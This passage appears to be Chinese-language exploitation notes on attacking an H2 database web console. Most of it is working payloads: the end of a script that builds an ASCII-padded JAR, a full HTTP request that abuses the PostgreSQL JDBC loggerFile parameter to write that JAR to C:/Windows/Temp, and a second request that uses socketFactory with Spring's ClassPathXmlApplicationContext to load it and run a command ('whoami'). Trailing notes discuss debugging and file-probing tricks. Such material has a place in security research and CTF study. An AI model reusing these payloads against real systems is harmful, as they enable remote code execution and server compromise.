output = open(jar_filename, 'wb')
output.write(wrap_jar(raw_data,compressed_data, zip_entity_filename.encode()))
print('[+] Generate {0} success'.format(jar_filename))
break
else:
print('[-] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(b_crc, b_raw_data,
b_compressed_data, b_cdzf, num,
padding_char))
num = num + 1
利用postgresql loggerFile写文件
POST /h2-console/login.do?jsessionid=5c80db64f648e5265fa86c4c8fe6d362 HTTP/1.1
Host: 172.22.10.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Referer: http://172.22.10.7:8080/h2-console/login.do?jsessionid=fd406a4fd140c1aae15e2d29715a4291
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://172.22.10.7:8080
Content-Length: 141
language=en&name=Generic+PostgreSQL&setting=Generic+PostgreSQL&user=sa&password=sa&url={{urlenc(jdbc:postgresql:///?loggerLevel=DEBUG&loggerFile=C://Windows/Temp/ascii02.jar&)}}PK%03%04%0A%00%00%00%08%00%00%00%00%00%06%1D%7Bo%0E.%00%00%02%1F%00%00%1A%00%00%00META-INF%2Fresources%2Fpoc.xmlD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswWt0GDDwGpDwwwGDtttwGwDtDGtGDDwGtptsGwwwtwt33333s03333sDdFPN~_kKBO%5DgWS%7B%5BnRzJZRB%5D%5BM%7BmS%5BCnREyQrVR~%5E%7C%5CNbrrBAAAAAAAAAAAAAAAAAAABrr%5E%7C%5CNu%5DU%5BWB_kK%5BWnRcwwGvjjoooJWGgS%5BC%7DgUk%5Do%7BgsJ%7BgCjWMc%5DkUju%5DU%5BWR%7C%5CBBBBBBB_kK%5BWv_WSnRcwwGvjjoooJofJ%7BgCjFZZzjeiIYMc%5DkUrS%5BWwU%5BM%5DR%7C%5CBBBBBBB_WSvWMc%5DkUI%7BMUwS%7B%5BnRcwwGvjjoooJWGgS%5BC%7DgUk%5Do%7BgsJ%7BgCjWMc%5DkUju%5DU%5BW%7C%5CBBBBBBBBBBBBBBBBBBBBBBBBBBBcwwGvjjoooJWGgS%5BC%7DgUk%5Do%7BgsJ%7BgCjWMc%5DkUju%5DU%5BWjWGgS%5BCru%5DU%5BWJ_WmR%5E%7C%5CBBBBNu%5DU%5BBSmnRm%5DM%7Bm%5DgRBMKUWWnR%7BgCJWGgS%5BC%7DgUk%5Do%7BgsJu%5DU%5BWJ%7DUMw%7Bg%7FJM%7B%5B%7DSCJi%5Dwc%7Bmq%5BO%7BsS%5BCQUMw%7Bg%7Fa%5DU%5BR%5E%7C%5CBBBBBBBBNGg%7BG%5Dgw%7FB%5BUk%5DnRWwUwSMi%5Dwc%7BmRBOU%0BD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswWt0GDDGGpDtGtttDGtwDwwwGGDGGDDwGwDDDwwGwwtwwt33333sww03333sDdFPw%5DfbSUOU_R_KsRuckmR%5EUWUW%7F%7B%5Dn%5BkO%5DGW%5DGR%7BUGg%5DNUg%5DZjNckUG%7FbrV%7C%5CBBBBBBBBF%7BG%5B%7B%5DGW%7FBkUK%5DfbUG%7DwK%5DkWgbV%7C%5CBBBBBBBBBBBBFscgWV%7C%5CBBBBBBBBBBBBBBBBFOUsw%5DV%7FOZZO%7Dvvv%5EQNIo~vyyz%7Fe%7FzCMaASUaiOEJzguaYSmasOukqOEJ%3AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwwGDGDDDwtswGsGwDDDwwGsGGtt33333sG03333sDfBDrmbI%5B~%7Cn%7CmGIgmeE%5E%5DBJwYefo%5DV%5Bwu%5CERUBEo%7DV%5BOm%7BnkuzcBaBfkAByBuzqbUeNRUKakAKFbAByruYq%5CUeF%7FZojZjqjqM%7BfBUiJWUerG~%5CJsM%7BEK%7Dj%5DjjoFjZK_gm%7B%5B%5CQcFjj%7FcgEcFjFBgS%7D%7BFOmVfwu%7FJfCVa%5B%5DvIgmBRvjj%5DAjjyjZ%23D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtsW033GwwwDtDDDtGswtGwDwwwDDDwwDwGwwwG333333G03333sfBDKJjJJNJaJZusIgZJJ%5EJJynJJvJZJzJzfMcMFNcuq%5DcyiQcuCR%5DUiqjJjaKnqO%5ByYE%5D%5E%7CO%5DUSuWqBQoeiRsAwzJZ%5CmGaYIlefroeYk%5DMfcWUmmJzJzJVSk%5DMSzWUfFgEorAU%5C~%5Cy%7C%5DfeiI%7BEzIby%7CIwMfcWUmuJzmzJz%7Ck%5DMSzWUfFgEorqeVNWM%7CF%7DUfqVJjajJjj%5ByYE%5D%5E%7CO%5DUSuWIf%5DoEiFCjwJiJaJnE%7CIlIf%5DoEiFCuwmJfJzJZ%7Ck%5DMSzWUfFgEorZUfF_uwuJfmzJzc%07D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwGGDGDDDwGwwtwwGswGDDtwGwGwwwttG33333sw03333sDfBD%5EukFBeqrgeyR%5Bn%5C~geE~%7FAOmJVJzJzy%5DK%5DzQKeBocmkYsIyY%5CufrsJajJNzoGeEUcnBocMkmwibQ_uyR%5BA%7CW%5EukFBeqrgeyR%5Bn%5C~geE~%7FA_K%5EukFBeqrgeyR%5BnbvKUkoKebawIyY%5CufrsAOOJVCJ%7DZCJMJZJjJjcGeEUcnBocMkmwmkYkMfYS%5DZr~UEQ%7BMBaVJ%1AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwGDGGDDDwwwGswGwwwGDDtwGtGsGD33333swG03333sdFPvjJJ%7C%7FueIjUBAK%5DbAGUkoKJqJFnf%7BGyCOJNJJKZCJSJZUjJJuGm%5BuwMBYjJzs%7BiVGc%7DkFwmVfWu_rQUkGKUbqRE%5CogUeuc%5EBocmk%5DwiBNguEA%5Ca_K~MkfB%15D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtttGDGDDD3GGswGDDtwGtswGG33333sw03333sDdFPqRWeyb%5B%5E%5CRcukYS%5DZW~rj%7Drna%7BrvorgrarIy%5C_geEUC%5E%7C_CMkmOYfC%7FUyFsAomr%5ErzrJ%7C%5DK%5DzbCMyi~rjBrZo%7BrForOrarzuVQ%5Cmr%7Dr~azrzfGC%5DkzOMfFwU%7FRI%5DVNGMkmVrZ~JrrCSM%7Cb%5CeyKwmozrf%7FC~ukF%7CeqRWeyb%5B%5E%1CD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwDGtGDDD3wGwwGwwDDDwwDwtwwwGwtwt33333ww03333sDfBDa%7BUenYuef%7CuEbSuYWGECoJaqJBZCJ%5CJz%5DjJJcjUBaK%5DvIO%5DCCJQqFJZV%7DK%7DFaWUea%7FJqJY%5EZKAMkfBUirWUEb%5B~%5CaWUea%7FQooJQoJRZCJFJz%5CjJJu%5CUen%5BueqNJzRjJjj%5BueIFuEaWUenKuFuGuE_sJqJw%5EF_gUeuc~B_cmk%5DO9D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwGGGGDDDwwwG3GwwDDDwwDwDwwwGG33333sw03333sDdFPbi%7FmeR%5BQ%7FKAmkVBuYJWueR%5B~bnKMk_KubIOikKK%5DvIrFjZZjfN%5EjZWjIofjVBGSCkfO%5DvVwM%7FJ%7FMeMWMea%5C~%5CMGMe_sZoZVzcZvjzuZjja%5BMUIZjzu%7ByvGSCkfO%5DvVwM%7FJqukGKubIr%5EE_guUMS~B_S%5Dk%7DOyBngMea%5CQoojYjZnzcZvjf%7BZjjSK%5Dkio%5DBKwCjcjyjfjZ%5Bi%7BmUAsAjcjycfjZBSS%5DkiWMUNNjVjZjj%7C%5BMUiyCUZK%7DkaWuU%21D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwGwDGDDDwwwGwwwGswGDDtwwtGtwGttt33333sw03333sDfBD%7FFjZijFO%5EjZgjyOfjZ%5BCg%5DBns%5DjSjEqfjF%5BCkCfaguUa%7FYvJsMvE_jqjM%5EzkAm%5BVBuiJgueR%7B~%5CaguUa%7FYvJsMvE_QOOjEOZuzSj%5DjVKZjznw%7D%5B%7DWuUZsuBsk~%5BawceJ%5CMiRiMUV%7CMUa%5CIbnwCUZn%5D%5BMwzjZ%5DjqjEm%5BVBuiJgueR%7B~%5CaguUa%7FYvJsMvE_ZOZCjqjn%5DvJsMfaguUa%7Fjqjk%5EfoGuUMs~Bos%5D%5B%7DwybI_meR%7BQ_kAm%5BVBuiJgueR%7B~%5CaguUa%7FQOOjUOZSzSZcjvf%5EjZgj~Ofjz%7BZ_%5DBak%7Dbaw%7D%7BANjvqZjZaGuUMs~bE%5CmeOwqUn_uUkAmUa%5CZOZ%5Bjqjf%7DBkrMqfjj_%13D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwGGGGDDDsGGwDtswDDDwwDwwtwwG33333swwG03333sdFP%5BQAOjUjZ%5Bz%5DZKjvkZjZIkQQS~UsVBEQJGEYRK%5E%5CJCUsicmFG~jf%5DjujkjeOZgjAjFMsiozjZwjAjNeBi%5CqsJ%5CeA%5DjMAfjfY%5B%7DmsfwuvVWe_JnuKaSeBi_ZOZ%7FjAjfiVSAaAfjfIo%7BEye%7D%5EBo%7DusMwABo%7DMb~rFjZ%7CjNEnjNAjmOfjZbe%7DuNiSqBEZjZEkQQS~UsVBEQJGEYRK%5E%5CSWmviKe9D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwtGGGDDD3wDwGwwwDDDswDwwtttwt33333wwG03333sdFPnrFjZRjNG~jNqjCofjzE%7Dk%7DfskUEIk%5DSSjcqfjzE%7Dk%7Df%7Ck%7DvsOujojcojczSjmjnjajjbjFoGjjSzzjqjAuBy%5CY%5By%7F%5DvJw%5DBYnjnqZjjk%7BueIe%5D%5Bk%5CuennjnUZjjRgUeusABkOA%7C%7D_MeIk%5DS%5DjKjfjZ%5Bssm%5BIWuqfj%5EKsaM%5BVBUiJWUER%7BA%7CQ%5C%5D%5Bkwu%7F%17D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE033GwttwDDDtswwtGswGDDtwGtGsGG33333sw03333sDdFPGiVGc%7DkFOmVfwu%7Fri%7DvnGmk%5DbzJZ%5EJNW%5EJJNJSJFJje%7D%7FMeqKJQJy%5EF_gUeuc~%5C_cmk%5DOY%7Cq%7FMEB%5Ba%7FKEzJZaJNR%5EJNsJsJFJjEuW%7DeA%7BzJZIJJU%5EJNsJsoFJjEAWm%7CAKzJZyJJU%5EJNsJKCFJjV9D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE033wwwDwDDDtwwwtwwGtwwtwGDDtwwtwtwwwtwwt33333ww03333sDdFPbUyAZjj%5Dom%7FROey%5CKzjzUjQjQukV%7CeIJWeyR%5B~%5CaRmBqKMQmjk_fjz%7C%5DK%5DVZ%7FMBZKm%5BqRFjz%5DjNW%5Ejn_j%5BCfjzBqoivJBUEnFeEaKFjzCjjr%5EjFQj%7BQfjjB%5DGMCCj%7B_fjZ%7FJSuybom%7CCNj%5EYZjjNwe_CjG_fjZ%7CawUzRK%7DvYNj%5EsZjjNoe_Cjg_fjfyGc%5DkfoMvVOU%7FJI%5Dy%12D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwwGGGDDDwwwGDwwGswGDDtwGtGD333333www03333sDdFP%5CME%7CSzoFWZQZnuBy%5CYKyw%7DNSWuQVZvIC%5BiN%5Bc%7DsVOmNvwu%7FjI%7DEr%5CME%7CSaooZGoFoFCFwZ%5EVzZFCkE%5C_%7BUeuc%5EB_cms%5DOYbq%7FMErKa%7FS~MsvBUIjgUErK%5E%7Cz%7FmBAS%5Db~JfZFUZ%5E~nZnRZWZVZVE%5Bc%7DsVOmNvwu%7FjQ%5Ds%2AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwGGDGDDDwGwwtwwGswGDDtwGtGGwwwt33333sww03333sDfBDcUE~%7FjOZBJaJAUBY%5CqyRO%5DEQI%5DVvSey%5CjJjmkNio%7BeEUCnBSwn%5CSWmVY%5CibQ_UyFgAOOJWJZRZ%7DZbJnkjJjF%7BeEUCnbY%5CuyOwiB~CMsRSm%7DmJwJzJfZC%5EusFBeqr%5BM_rvMKj%7C%5DF~%5CmsYCMIG%5BY%7DOJja%1AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sGDtwDGtGDDD3wGswGDDtwGtGDwwGtwwt33333wwG03333sdFP%5CzSzJjArZjj%5ECMISjoIfjFNe%7FmEiK%7DvKW%5DuiKCSfj%5E_sa%5DkVbMYJgMUR%5BABQ%7CCkKwm%7FgGyvGsckfOcuiG%7DzJyMbVw%7Dke_qoojooFfzSzJjaEZjjjnjaCZjjc%7BMuQqmus%7CjIjF~zK%5DFjF%5Eja%7B~jA%7Cj_ofjVbGsckfO%7DvVwm_JycN%5EG%7DkczcUKgmve_ZoFQzSFqj%2AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDttwGGGDDDsGwwGtswDDDwwDwtwwwGGwt33333www03333sDfBDsZjjuc%5DNZKmkQZjz%5C%7BivGc%7DkfOmvVwu_Ji%7DNnGmk%5Dr%5EYogUeuc~%7Cocmk%5DOYBq_MER%5BQ%5ByGmvqK%5DSWAjajj%5CQ%7Bj%7FCFIjQjfmkyb%7D%2AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtsW033GwwwDwDDDtsGswtwwGDDtwGwGDwGwtwwt33333wwG03333sdFPoj%5CjjqzSzJjayZjjsl%5D%5Cal%7DkKwMooj%5CojqzSFQjaSZjj%7B%5BMUiaMUa%7FueCKFjFmjjr%5EjjSj%7Cofjf%5CWAmkV%7CuYJgueR%5B~%5Cal%7DkKwM%7FgNjalZjZaGuUMs~%7CKO~lKw%7DNElyBi_MeVWZoFcjIjvMUK%5EMEsZzjFsjIj%5E%7DBis%7D%5Bi%7FE%7CKlmjfjVYsAmkV%7CuYJgueR%5B~%5Cal%7DkKwM%7Fg%7BeSojbo%06D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwDwGGDDD3wwGwwGwDDDwwDwDwwwtGwG33333www03333sDfBDszcj%5CjqEZjjMWMUb%5BCvcajq%7Djmi%7BjQjF%7BjijvuBSS%7DsV%5Cjijf~fsGioojRcFgzcj%5CjqoZjZE%7Bi_KamkVBuYJWuUb%5BA%7CQ%5C%7DkKwM%7FWajNsjrc%7BjQjFOjijn%7DvV_%7DBe%5E%5D%5BiZjZE%7ByvGSCkfO%5DvVwM_JyCN%5EG%5Dk%7Dr~EsajIf%2AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sGDttwGwGDDDwwGGtsGwwwGDDtwGtwGwwtDt33333sw03333sDfBDjcGzCzV%7FzIzF~cczZIvzFBkWMNERYBuAzq%7DzjcGzazVRzIzn%7DbEs%7Dbi_mer%7BzIze%5Evkn%5EyoguUMS~BoS%5D%5B%7Dwybi_mer%7BQOOz%5CcVJfcz%7CzqOFzzosuUakaKivMeawMNyFzFuGY%0ED0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sGDtDDGwGDDD3wwwtwwwDDDtwDwGtGwG33333swwG03333sdFP%5Bc%7DKFwmVfWM_rY%7Dvn%5BmK%5Db%5EEgZzJz%5CJqR%5EJJNjJJFJJUCjJJuke%7CN%5Be%7CNAJINjJOkJJCFFJIJf%5EfgZ%5EEuAJJyjjCkJaJFvJIJV~%7Fs%7B~%7FijZJFnzJZuJNG%5EJJNjZOFJZV%7Ds%7DFnB%7DVE%7FJIJF%5EZsmICOjzIFQZCJ%7CJIRjJJoSuUas%21D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwGGwGDDD3wDwwwGwDDDwwDwtwwwDD33333swG03333sdFPsiv%5D%5BqwMNEzZzuGU%5C%5EgyNgSC%5BVw%5DNvWM_jyCn~g%5D%5B%7DrfZViZi%5EAZZ%5EzVOVZzYJRm%7F%5CjFZVeZIZU%7DbeWa%5B%7Cg%7DBQWIKvyiyu%5CiNes%5DBik%7DcczvOVZzBMw%7DKRS%5DUEQZiKZuZGZNOVmZIZQMNes%5DBikI%7Be%5BM%5Be_FZV%7DZIZa%5D%5BebYUR%7FCNvWuBEzZzIGAE%2FD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtwDGDGDDDwGswwtwGwwGDDtwGwwGwwwt33333swG03333sDfBDGEyeCnB_CuKMOIBvGeY~%5CAooJf%7DZ%5Dj%7DrurqrJrrvua%7DMJV%7DZrZF%7BCmKZwmyQ%7BujbjEy~s~SaVrqaJrr%7BkeyQZeY~OeFi%7FjrZKrarFeFiSuBQsjrZ%5BrarNeBi%5CQYbSuBQsM%7D%7DJN%7DZrZ%7CW%5EUKzBEqRgEYbkn%5CRcUKiS-D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDwwtGtGDDDswGwGwtwGwGDDtwGttwwwGtwwG33333wwG03333sdFPfgnZiozZZrKmkQOuNEymBQ%7C%5DkKwuoCzACVZv%5BQBmcrWMeQSAs~zy%7CybQVEwUbjsue%5E%5EZYZzZZuKmkQOuNy%5EZY%5EzZZJ%5Cq%7FJ%5Cq%7FJ%5Cq%7FJ%5Cq%7FJ%5Cq%7FJ%5EZYIzZZCJUb_GmkK%7CqC%7BZZCZ~ZIZVIbjsuIVZFsERUbEo%7DNKOm%5BazZZBY%7DNvSM%7C%02D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sGDtwwttGDDD3swDtGDDDtGtwtwttwG33333sw03333sDfBDc%5DNEcMkoKzfvzzCzvzzzzzzzAzzvzFyznzz~FizzzzFuzzyzFzzzzfe%7BRzz%5B%7BWOzIgyzzzzzFiyzzzzyzzyz~zz~zVCzYzzvFizzzzzjzzyzFzzzzzo~EgzzzzzzzzCzQzzMzzyvrzzzVayznzzgzzzAnvc%5DenyiZzFwzzFbbzfNqaOebzf%5DGzyiZzzebzfwzzfRzzfRzzfBIz%7Fr%7DQQJSzcug%5EUabzVzeqGMziAsfzeO%7DqGMzqF~JWCzrky%5E%7FQF%7C_WCz%5CvsfbzvyJFFsvFQMzEosvQF%7C_WCFQiCum%06D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtsW03sDGDttDtGpt3wwwtwwGDDtwDtwtwwG333333G03333sdFPMeRa%7Dv~g%5DrZA%5DIKRrZBr%7Dczg%5DRlZcl%7CRZQBrrcZrneRqocZFQy%7CRZGBrqczg%5DRlZSF%7CRZQBrNmRN%7FkFFQy%7CRjB%7CRzQIiMeRqjkZ%5BOREA%5DmUrMeRa%7BeRYneRYrvqg%5DrZA%5DQUrRI%7CRZmUrrczg%5DrnA%5DiUrMeRa%7Dvyg%5DrZA%5DIKRrQBr%7Dczg%5DRlg%5DriZSu%7CRZQBrrcZrneRqocZFQy%7CRZGBrqczg%5DRlg%5DruZS_%7CRFvEFQy%7CRjB%7CRF%5EIEneRAvcrzoczg%5DRlZsy%7CRZQBrrcZrneRqocZFQy%7CRZwRRFmBr%5D%5E%7CroifFQu%7CRFWCRAOUr%7Difg%5DrWg%5DRlZKJ%7CRZQBrrcZrneRqocZFQeYrbeRM%7BeRIbeRa%7Dv_rn%5CR%06D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sGDtwwtwGDDD3swGtGDDDGtwGtDtt33333swwG03333sDfBDBkvgsfrMj%5DFAekN%5EE%5Dmfj%5DFCG%5DFUoUzFFe%7DFoUrF~_uWsFGYsM%7Dffk%5EnEcbF%5EJbFNwbFvrUSsUzFfW%7DF_A%7CMj%5DFsekN%5EE%5Dmfj%5DFCG%5DFUoUzFFe%7DF%7F%7BRFAiuWsFGoFF%7CYss%7DVI%5DFu_knWsF%5CN%5BMvOEFCWsFK%5EEMvOEFNWsFGYsk%7DVC%5DFyKQ~Fj%7CF%5Ej%5DFsekaFj%7CFfq%5DFQZF%06D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDwwGwtGDDDwwGswwGwGwGDDtwtwtwtwwDGt33333www03333sDdFPKEgANYgmfaszk%7DMz%5By%5BAOsfeNYwbz~cGzzJGzzeJfMYnz%5DS%5Cv%5EYVz%5DSZJJCzFv%7F_zzMz%5DzF%7CznCzvofezAzzgozEzAezOzfRzFQzbsV%7BzI%5BzvoNkzK%7CfQoz%5EzzzfYY~vzFezzYvJzzzzgYzY%5CszWFozkFozOzSjzEYzNFozfFozkFozOzYCzysCzFzzFFozEVU%7CnzFi%5CzFQzFoCzzsCz%5EoCzaYvnzvMnzzYnzFQzzYCzv%5CgzvB%7CnzFQY%5CYFqFoFGzSozroCzqijzzsz%5EFozfFozkFozOzYCzysCzFzCzmovzzYCzfzn%5CzzezFzCzzsCz%5EoCzaYvzzzu%5Czz%5EzzYCzzszFFozU%5CzzzFozvzzgz%7BzfazzvFIzzzzIQzFzznzzzz%5BoYjvW7D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDtswDDDtwwwtwwwtwwttGDDttDwGwttwwwt33333www03333sDdFPRFAzIQqMFNE%7FBFa~E%7BQMFiAKFfYqZ%5ErKF%5EF%5DzFvymF_akU%7CKNNGSeuYUGUJ%7DFnY%5DzFvymF_aGU%7CKNNG_euYUGU%5CJRFQ~wwcV%7CwcVjicEjFQ%7Cm%5EYEbFqFEogMF_s%5BnNWcJfSKnwcvqkYFCOovi5D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sGDwtwttGDDDswtDsGGGDDDswwtttwwtG33333wwG03333sdFPMmz%7F_knwcVynIebzaubzaQbzakJFGC%7CR_knWvogwcVmWzzFzzzzKzfazzczzIvJzzzzaczn%7CIzuzImzaFSiFoV%7D%7Cozczzm%5EzVIFFozBFoV%7DFoVcFofZFozBzzzK%7Cozfzzv%5EzVIzzImzfzzAz~%7BzsozfzyczzzfrzzUzFczzz~jYrkoFyY%7BgwcV%5B%5BIfzAsObzQ%5BbzQbrzqfrzqI%5Cz%7FUvz%7FUNNIE%5D%7BczMNIIG%01D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtsW03sDGDwttwwGDDD3GswtGDDDwGwGGGtwwwt33333wwG03333sDdFPJmzrYysNYusOsVOmVmvKzUFG%5C%5C%5Bo_z%7CME%7BWOsVGFnzcmFUvmf%7BEZWmzl%7Dmz%5C%7DsFz%7DsFF%7DCFfvBJzqR%5DO_Viv_vaOsVeQQsFVQmFvQsFF%7DsFNQmz%7C%7FqFNWmz%7CJmzB%7DzgozvqwzzzzzvFIszzzFCzz%5Cjz~sznF_z%7CF_z%7CFYvFzYzz%5ESszEYvRzzzzFzzFzzszfsVlzijzzsvbzzzzk_znzzYzzz%06D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sDDwtttwGDDD3swttGDDDwDtwtGswG33333wwG03333sDfBDoV_VMOZV%5DeFWeZy%7CVoYZ%5DuYQEqvIBZ%5EVgwCVcza%7CZzvsfAKIBZFoZZEiZZEI_ezQz~%5DCzN%7C%7CWV_VkZr%7CZNrMZCYVfoYZVwCZgeSBBZfbeZEsVoYZ%5DuYQEqvIBZ%5EVwza%7CZzvsfAKIBZFoZZEiZZEI_ZZVZZZZWZF%7CZFZZzZe%5BZZZZNZZvwz_Z%5EZesZZZZVZZVZFZZ~ZyVzVCZFZeCZZZFoZZMZzYZZZn%5BzezQz~%5DCzN%7C%7CWV_VgZ%7DZZn%5DMZCE_z_ZVwwCZgeSBBZfbeZEJVoYZ%5DuYQeZEqewCFzaYEjZZymZ%7F%7BewCZg_ZZ%7CeA%7DZq%7CbeZeNbZywqaaMz%5Ee%5BVNYEBZfbeZeQVoYZ%5DuYQeZEqewCFzNYYVoYZVuYQGUrMZAJZZqV_gWZZzZZ%5EZYYzVZZCZZYVRZZZZN_ZF%5C_zVZZ%5EnZEQnZfYZZY%7DZFi%7CZQ_%7DZN_%7DZzZ%16D0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUU7CiudIbEAtswE03sGDGwtwGptwwtwtwwtwGwtDDDtswGtGwwwG33333www03333sDfBDrZZZZzZZzZZCZFqVFZqAZZqVRZZZZiqZvZZqZZZZ%7BVoVBWCVqYF%7B%5COZcaZ%7FRm%5EGJSZzMgNi%5BmA_gm%5EjroAR%5EIynqfZU%7D%7CJi_oZZZZZqVJZZZZfqZF%7CCZQzoVszoVsZIKZFZVbZZeZZqVRZZZZ~CZFZZVZZZZawoZFEuMzaB%5DkZZI~gqZzZZZZFZZ~ZZCZZqVJZZZZzoZFioMZFZZZZ%1AD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAt3wwwEpDDGGpDwwwDGtDtwDDGDDGtG0GDDswGwwG333333G03333sdFPQQavwESWMqb%5Cb%5CzzzzzzzzzzzzavSCGgqb%5Cb%5Czzzzzzzzav%5B%7Bk%5BM%7Bg_qb%5Cb%5CzzzzaveMEKqb%5Cb%5CzzzzaeMEKzCuQFUSEGGYkEuM%7BFzUSEGGQFcEwEoVsEKE%5DMsMKgVSkEuCK%5DVyYMgFvqb%5CzzzzaeMEKzCuQFUSE%7F%7FFzmEUgk%7B_feMEKQFUSEGGYkEuM%7BFzmEUgk%7B_fsMg%7DkuQFuMmCKMISEGGFqb%5CzzzzzzzzaUkKGg%7BWUgk%7BfE%7B%5Dz%7BMmQFuMUkuM%7BFvqb%5CzzzzzzzzaUkKGg%7BWUgk%7BfE%7B%5Dzg_%5BMQFCKgFzwESWMQFNFvqb%5CzzzzzzzzaUkKGg%7BWUgk%7BfE%7B%5Dzg_%5BMQFCKgFzwESWMQF~n%5EAFvqb%5CzzzzaveMEKqb%5Cb%5CzzzzaeMEKzmEUgk%7B_feMEKQFUSE%7F%7FFzmEUgk%7B_fsMg%7DkuQFKMOiKGgEKUMFvqb%5CaveMEKGqb%5Czzzzzzzzzzz%3APK%01%02%00%00%0A%00%00%00%08%00%00%00%00%00%06%1D%7Bo%0E.%00%00%02%1F%00%00%1A%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00META-INF%2Fresources%2Fpoc.xmlPK%05%06%00%00%00%00%00%00%01%00H%00%00%00F.%00%00%00%00
用socketFactory去加载
POST /h2-console/login.do?jsessionid=5c80db64f648e5265fa86c4c8fe6d362 HTTP/1.1
Host: 172.22.10.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Referer: http://172.22.10.7:8080/h2-console/login.do?jsessionid=fd406a4fd140c1aae15e2d29715a4291
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://172.22.10.7:8080
X-Authorization: whoami
Content-Length: 141
language=en&setting=Generic+PostgreSQL&url={{urlenc(jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///C:/Windows/Temp/ascii02.jar!/META-INF/resources/poc.xml)}}
根据报错信息,jar包是成功写上去了(ascii02显示ZipException,ascii03显示FileNotFoundException),但是这个写文件是通过写日志文件保存,如果日志前半部分有影响zip结构(中央目录项和EOCD块),那就不能解析jar
打临时文件加载也不行,我怀疑是用Tomcat结束了文件上传的请求spring再解析的参数?因为code-breaking 205是直接把参数用get接收,而这里很明显可以看到是post接收的参数,我们现在可以合理猜测需要分两个请求传输,也就是先驻留一个文件,下次再用CPX加载
这里有个trick:
file协议直接读不会有file not found的报错信息
根据上面写jar的经验,发现jar可以探测文件是否存在,不过可惜的是,jar并不能与通配符搭配使用(已实践),所以 jar:file://**/*.tmp 的探测手法不能用
